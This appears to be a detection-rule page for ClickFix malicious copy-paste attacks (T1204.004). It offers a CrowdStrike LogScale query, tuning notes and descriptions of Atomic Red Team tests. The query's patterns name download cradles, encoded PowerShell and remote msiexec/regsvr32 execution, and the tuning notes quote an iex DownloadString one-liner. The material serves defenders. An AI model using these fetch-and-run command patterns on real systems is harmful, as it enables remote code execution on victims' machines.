Detect Malicious Copy and Paste in CrowdStrike LogScale
Adversaries may rely upon a user copying and pasting code to gain execution (ClickFix). Victims are presented with fake error messages, CAPTCHA prompts, or troubleshooting instructions on malicious websites or in phishing emails that instruct them to open a terminal, Windows Run dialog, or command prompt and paste a pre-supplied command. The pasted command typically includes download cradles, encoded payloads, or inline scripts designed to establish a foothold on the victim machine. ClickFix bypasses email filtering, browser sandboxing, and file execution controls because the user themselves executes the payload. Threat actors including Contagious Interview (DPRK-linked), Havoc C2 operators, and Lumma Stealer distribution campaigns have heavily leveraged this technique against enterprise users.
MITRE ATT&CK
- Tactic
- Execution
- Technique
- T1204 User Execution
- Sub-technique
- T1204.004 Malicious Copy and Paste
- Canonical reference
- https://attack.mitre.org/techniques/T1204/004/
LogScale Detection Query
#event_simpleName=ProcessRollup2
| ParentBaseFileName = /^(explorer\.exe|chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe|brave\.exe)$/i
| ImageFileName = /\\(powershell\.exe|pwsh\.exe|cmd\.exe|mshta\.exe|wscript\.exe|cscript\.exe)$/i
| CommandLine = /(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bIWR\s|\bcurl\s|\bwget\s|certutil.*urlcache|bitsadmin.*transfer|-EncodedCommand|-enc\s|FromBase64String|Invoke-Expression|IEX[\(\s]|javascript:|vbscript:|msiexec.*https?:|regsvr32.*\/i:https?:)/
| RunDialogExecution := case {
ParentBaseFileName = /(?i)^explorer\.exe$/, "true";
default, "false"
}
| BrowserSpawn := case {
ParentBaseFileName = /(?i)(chrome|firefox|msedge|iexplore|brave)\.exe/, "true";
default, "false"
}
| DownloadCradle := case {
CommandLine = /(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|certutil.*urlcache|bitsadmin.*transfer|\bcurl\s|\bwget\s)/, "true";
default, "false"
}
| EncodedPayload := case {
CommandLine = /(?i)(-EncodedCommand|-enc\s|FromBase64String)/, "true";
default, "false"
}
| InlineScript := case {
CommandLine = /(?i)(javascript:|vbscript:)/, "true";
default, "false"
}
| InvokeExpression := case {
CommandLine = /(?i)(Invoke-Expression|IEX[\(\s])/, "true";
default, "false"
}
| RemoteExec := case {
CommandLine = /(?i)(msiexec.*https?:\/\/|regsvr32.*\/i:https?:\/\/)/, "true";
default, "false"
}
| ClickFixScore := (if(RunDialogExecution=="true", 1, 0)) + (if(BrowserSpawn=="true", 1, 0)) + (if(DownloadCradle=="true", 1, 0)) + (if(EncodedPayload=="true", 1, 0)) + (if(InlineScript=="true", 1, 0)) + (if(InvokeExpression=="true", 1, 0)) + (if(RemoteExec=="true", 1, 0))
| select([_time, ComputerName, UserName, ImageFileName, CommandLine, ParentBaseFileName, ParentCommandLine, RunDialogExecution, BrowserSpawn, DownloadCradle, EncodedPayload, InlineScript, InvokeExpression, RemoteExec, ClickFixScore])
| sort(field=[ClickFixScore, _time], order=[desc, desc])Detects ClickFix / Malicious Copy-Paste (T1204.004) using CrowdStrike Falcon ProcessRollup2 telemetry. Identifies scripting interpreters (PowerShell, pwsh, cmd, mshta, wscript, cscript) spawned by explorer.exe or browser processes where the command line contains ClickFix indicators: download cradles (Net.WebClient, certutil, bitsadmin, curl), encoded payloads (-EncodedCommand, FromBase64String), inline execution (Invoke-Expression, IEX), inline scripts (javascript:, vbscript:), or remote installer execution (msiexec/regsvr32 over HTTP). Each event is scored across seven behavioral categories with results sorted by composite ClickFixScore for prioritized triage.
Data Sources
Required Tables
False Positives & Tuning
- CrowdStrike Falcon sensor updates or CrowdStrike-initiated remediation actions that spawn PowerShell with download parameters under the Falcon agent context, which may surface explorer.exe as the effective parent in certain Windows process inheritance scenarios.
- Enterprise software vendors (e.g., Citrix Workspace, VMware Horizon) whose browser integration components spawn local PowerShell or script helpers from the browser parent process with connection configuration passed as encoded arguments.
- Legitimate software packaging workflows using tools like Chocolatey or Scoop where a developer pastes installation one-liners (e.g., Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString(...))) from vendor documentation into Run or a terminal.
- Security awareness training platforms that simulate ClickFix lure pages in controlled environments to test user susceptibility — these produce real execution events matching all ClickFix indicators.
Other platforms for T1204.004
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1ClickFix Run Dialog PowerShell Download Cradle Simulation
Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing 'Net.WebClient', 'DownloadString', and 'IEX'. If executed via Win+R: ParentImage=explorer.exe, Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU containing the pasted command. Sysmon Event ID 3 (Network Connection) attempt to 127.0.0.1:8080 (connection refused, but event fires). PowerShell ScriptBlock Log Event ID 4104 with script content.
- Test 2ClickFix mshta Inline JavaScript Execution
Expected signal: Sysmon Event ID 1: Image=mshta.exe, CommandLine containing 'javascript:' and 'ActiveXObject' and 'WScript.Shell'. Sysmon Event ID 1 child: cmd.exe spawned by mshta.exe with CommandLine 'cmd.exe /c echo ClickFix-AtomicTest > ...'. Sysmon Event ID 11 (File Create): %TEMP%\clickfix_test.txt. If via Win+R: Sysmon Event ID 13 (Registry Value Set) on RunMRU key.
- Test 3ClickFix Base64-Encoded PowerShell via Run Dialog
Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing '-EncodedCommand dwBoAG8AYQBtAGkA'. If executed via Win+R: ParentImage=explorer.exe; Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU with the encoded command string. PowerShell ScriptBlock Log Event ID 4104 shows decoded content 'whoami'. The encoded value 'dwBoAG8AYQBtAGkA' decodes from UTF-16LE Base64 to 'whoami'.
- Test 4ClickFix msiexec Remote Package Execution
Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'msiexec /i https://'. Sysmon Event ID 1 child: msiexec.exe with CommandLine containing 'https://127.0.0.1:8443/clickfix-payload.msi' and '/qn'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8443 (will fail, no listener). If run via Win+R: Sysmon Event ID 13 on RunMRU key.
References (8)
- https://attack.mitre.org/techniques/T1204/004/
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
- https://www.reliaquest.com/blog/using-captcha-for-compromise/
- https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages
- https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/
- https://asec.ahnlab.com/en/73952/
- https://asec.ahnlab.com/en/85699/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.004/T1204.004.md
Unlock Pro Content
Get the full detection package for T1204.004 including response playbook, investigation guide, and atomic red team tests.